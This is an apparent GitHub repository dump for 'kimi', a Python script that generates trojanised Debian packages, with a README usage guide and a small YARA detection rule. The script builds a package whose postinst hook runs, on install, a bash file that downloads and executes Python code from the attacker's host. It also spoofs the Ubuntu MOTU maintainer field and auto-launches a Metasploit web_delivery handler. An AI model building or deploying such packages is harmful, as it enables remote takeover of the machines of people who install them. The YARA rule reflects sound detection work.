├── MDPC.yara ├── README.md ├── kimi.py └── screenshots ├── exploiting1.1.png └── kimi.PNG /MDPC.yara: -------------------------------------------------------------------------------- 1 | rule MDPC 2 | { 3 | meta: 4 | author = "@bofheaded" 5 | date = "24/04/2019" 6 | description = "YARA rules for Kimi MDPC. Used in Venom Shellcode Generator too." 7 | sample = "f13196cf741c65115b0c350616fcba6d" 8 | strings: 9 | $hex = {C2 CC 26 A3 59 3A CD AA 9F} 10 | condition: 11 | $hex 12 | } 13 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # kimi - Malicious Debian Package generator 2 | Script to generate malicious debian packages (debain trojans). 3 | 4 | # About & Plus points & Usage & Tested On ::: 5 | Kimi is name inspired from "Kimimaro" one of my favriote charater from anime called "Naruto". 6 | 7 | Kimi is a script which generates Malicious debian package for metasploit 8 | which consists of bash file. the bash file is deployed into "/usr/local/bin/" directory. 9 | 10 | Backdoor gets executed just when victim tries to install deb package due to postinst file 11 | 12 | Bash file injects and also acts like some system command which when executed by victim 13 | and attacker hits with session. 14 | 15 | Plus Points : 16 | -- Fully indiependent. Means user no need to install any debian package creator 17 | -- Can be integrated with any payload generator easily due to engagements of arguemt (lame :P i know) 18 | 19 | Kimi basically depends upon web_delivery module and every thing is automated. 20 | all the attacker needs is to do following settings : 21 | 22 | Setting up Web_Delivery in msf : 23 | 24 | msf > use exploit/multi/script/web_delivery 25 | msf exploit(web_delivery) > set srvhost 192.168.0.102 26 | srvhost => 192.168.0.102 27 | msf exploit(web_delivery) > set uripath /SecPatch 28 | uripath => /SecPatch 29 | msf exploit(web_delivery) > set Lhost 192.168.0.102 30 | Lhost => 192.168.0.102 31 | msf exploit(web_delivery) > show options 32 | msf exploit(web_delivery) > exploit 33 | 34 | Generating Malicious payload : 35 | 36 | dreamer@mindless ~/Desktop/projects/kimi $ sudo python kimi.py -n nano -l 127.0.0.1 -V 1.0 -a i386 37 | 38 | NOTE :: This project was made to be integrated with Venom Shellcode Generator 1.0.13. 39 | It can be used standalone also all user needs is to change uripath in msf variables 40 | ------------------------------------------------------------------------------------- 41 | 42 | Tested on : 43 | Linux Mint 17.2 Cinnamon (Ubuntu 14.04) 44 | ParrotOS (Debian Jessie) 45 | Kali Rolling 2.0 46 | # Updates ::: 47 | [Feb-22-2017] 48 | -- Added "postinst" file creation function to make embeded malicious file execution automated 49 | -- Added RC file generation function to fully automate with handler opening, means no need to 50 | set handler manually 51 | -- Patched some common bugs [special thanks to r00t 3xp10it :)] 52 | 53 | [Oct-12-2017] 54 | -- Added command line argument(-a/--arch) to select architecture(i386/amd64) 55 | 56 | [April-24-2019] - Test Release. 57 | -- Now custom URI and LPORT can be set 58 | -- Python payload has been updated according to python 2/3 and latest version of Metasploit 5 too. 59 | -- Whole code is re-implemented though its still supporting python 2.7 60 | 61 | # ScreenShots ::: 62 | 63 | ![Main Banner](https://raw.githubusercontent.com/ChaitanyaHaritash/kimi/master/screenshots/kimi.PNG) 64 | ![Kimi In Action](https://raw.githubusercontent.com/ChaitanyaHaritash/kimi/master/screenshots/exploiting1.1.png) 65 | 66 | # Misc ::: 67 | Blog Post : http://hackinguyz.blogspot.in/2017/03/kimi-malicious-debian-package-creator.html 68 | YouTube Video : https://youtu.be/Dsn6BRHy9_w 69 | Viruatotal Sample (Because i saw nasty use of this script in the wild): 7d91abb413c8cd3274f348ff12f244b9a503abfe018f138d34bbe2deab04472f 70 | 71 | # Shouts to ::: 72 | Suspicious Shell Activity [Red Team] 73 | # Doubts? Insults? 74 | Twitter : @bofheaded 75 | -------------------------------------------------------------------------------- /kimi.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python2 2 | 3 | __version__ = "1.2" 4 | # ____ __. .__ .__ 5 | #| |/ _| |__| _____ |__| 6 | #| < | | / \ | | 7 | #| | \ | | | Y Y \ | | 8 | #|____|__ \ |__| |__|_| / |__| 9 | # \/ \./Suspicious Shell Activity 10 | # Malicious Debain Package Creator 11 | # Coded by Chaitanya Haritash 12 | # Twitter :: @bofheaded 13 | 14 | ## 15 | # Information ::: 16 | 17 | #Kimi is a script which generates Malicious debian package for metasploit 18 | #which consists of bash file. the bash file is deployed into "/usr/local/bin/" directory. 19 | #Bash file injects and acts like some system command which when executed by victim 20 | #and attacker hits with session. 21 | 22 | #Kimi basically depends upon web_delivery module and every thing is automated. 23 | #all the attacker needs is to do following settings : 24 | 25 | #NOTE :: This project was made to be integrated with Venom Shellcode Generator 1.0.13. 26 | # It can be used standalone also all user needs is to change uripath in msf variables 27 | 28 | #msf exploit(web_delivery) > set srvhost 192.168.0.102 29 | #srvhost => 192.168.0.102 30 | #msf exploit(web_delivery) > set uripath SecPatch 31 | #uripath => SecPatch 32 | #msf exploit(web_delivery) > set uripath /SecPatch 33 | #uripath => /SecPatch 34 | #msf exploit(web_delivery) > set Lhost 192.168.0.102 35 | #Lhost => 192.168.0.102 36 | #msf exploit(web_delivery) > show options 37 | #msf exploit(web_delivery) > exploit 38 | 39 | #Thanks r00t 3xpl0it for all corrections and ideas :) <3 40 | 41 | ## 42 | 43 | import os,time,shutil 44 | import argparse 45 | 46 | banner = r""" 47 | ____ __. .__ .__ 48 | | |/ _| |__| _____ |__| 49 | | < | | / \ | | 50 | | | \ | | | Y Y \ | | 51 | |____|__ \ |__| |__|_| / |__| Ver {0} 52 | \/ \./Suspicious Shell Activity 53 | Malicious Debain Package Creator 54 | Coded by Chaitanya Haritash 55 | Twitter :: @bofheaded 56 | """.format(__version__) 57 | 58 | payload = """ 59 | #!/bin/bash 60 | python -c "import sys;u=__import__('urllib'+{2:'',3:'.request'}[sys.version_info[0]],fromlist=('urlopen',));r=u.urlopen('http://lhost:8080/SecPatch');exec(r.read());" 61 | """ 62 | 63 | def mkpost(name): 64 | m = """ 65 | #!/bin/bash 66 | 67 | chmod 2755 /usr/local/bin/"""+name.replace(".deb","")+""" && /usr/local/bin/"""+name.replace(".deb","")+""" & 68 | """ 69 | return m 70 | 71 | def make_deb(name,arch,name_ver,ver): 72 | gen = """ 73 | #!/bin/sh 74 | chmod u+x """+name+""" 75 | cat >> control << EOF 76 | 77 | Package: """+name+""" 78 | Version: """+ver+""" 79 | Section: Games and Amusement 80 | Priority: optional 81 | Architecture: """+arch+""" 82 | Maintainer: Ubuntu MOTU Developers (ubuntu-motu@lists.ubuntu.com) 83 | Description: MDPC kimi (SSA-RedTeam development 2017) 84 | 85 | EOF 86 | 87 | mkdir -p """+name_ver+"""/usr/local/bin 88 | cp """+name+""" """+name_ver+""" /usr/local/bin 89 | mv /usr/local/bin/"""+name+""" /usr/local/bin/"""+name.replace(".deb","")+""" 90 | sleep 2 91 | mkdir -p """+name_ver+"""/DEBIAN 92 | cp control """+name_ver+"""/DEBIAN/control 93 | cp postinst """+name_ver+"""/DEBIAN/postinst 94 | sleep 3 95 | dpkg-deb --build """+name_ver+""" 96 | """ 97 | os.system(gen) 98 | time.sleep(2) 99 | os.remove(name) 100 | os.remove("control") 101 | os.remove("postinst") 102 | shutil.rmtree(name_ver) 103 | print "All done!!" 104 | 105 | def make_resource(lhost,uri): 106 | res = """ 107 | use exploit/multi/script/web_delivery 108 | set SRVHOST """+lhost+""" 109 | set LHOST """+lhost+""" 110 | set URIPATH """+uri+""" 111 | exploit 112 | """ 113 | b = open("handler.rc" , "w").write(res) 114 | print "execute handler: sudo msfconsole -r handler.rc" 115 | time.sleep(2) 116 | os.system("chmod 777 handler.rc") 117 | os.system('xterm -e "sudo msfconsole -q -r handler.rc"') 118 | def main(): 119 | print banner 120 | parser = argparse.ArgumentParser() 121 | parser.add_argument('-n','--name', help="Name for your package" , required="true") 122 | parser.add_argument('-l','--lhost', help="LHOST, for Handler" , required="true") 123 | parser.add_argument('-p','--lport', help="LPORT for Handler" , required="true") 124 | parser.add_argument('-u','--uri', help="URI of handler" , required="true") 125 | parser.add_argument('-V','--vers', help="Version for package" , required="true") 126 | parser.add_argument('-a','--arch', help="Architecture (i386/amd64)" , required="true") 127 | go = parser.parse_args() 128 | if os.getuid() != 0: 129 | print "Script requies root privileges for certain operations, aborting" 130 | else: 131 | try: 132 | j = str(go.name)+"_"+str(go.vers) 133 | mkpay= payload.replace("lhost",go.lhost).replace("SecPatch",go.uri).replace("8080",go.lport) 134 | f = open(go.name,"w+").write(mkpay) 135 | mkpost_script = open("postinst","a").write(mkpost(go.name)) 136 | os.system("chmod 0755 postinst") 137 | print "[+] Building the package : ",go.name 138 | time.sleep(2) 139 | make_deb(str(go.name),str(go.arch),str(j),str(go.vers)) 140 | print "[+] msfconsole will start in few :)" 141 | make_resource(go.lhost,go.uri) 142 | except Exception as e: 143 | print "Something is not going good : ",e 144 | if __name__ == '__main__': 145 | main() 146 | -------------------------------------------------------------------------------- /screenshots/exploiting1.1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ChaitanyaHaritash/kimi/e7cafdad16d3cd5487d505e49dbeb1d4d8279f84/screenshots/exploiting1.1.png -------------------------------------------------------------------------------- /screenshots/kimi.PNG: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ChaitanyaHaritash/kimi/e7cafdad16d3cd5487d505e49dbeb1d4d8279f84/screenshots/kimi.PNG --------------------------------------------------------------------------------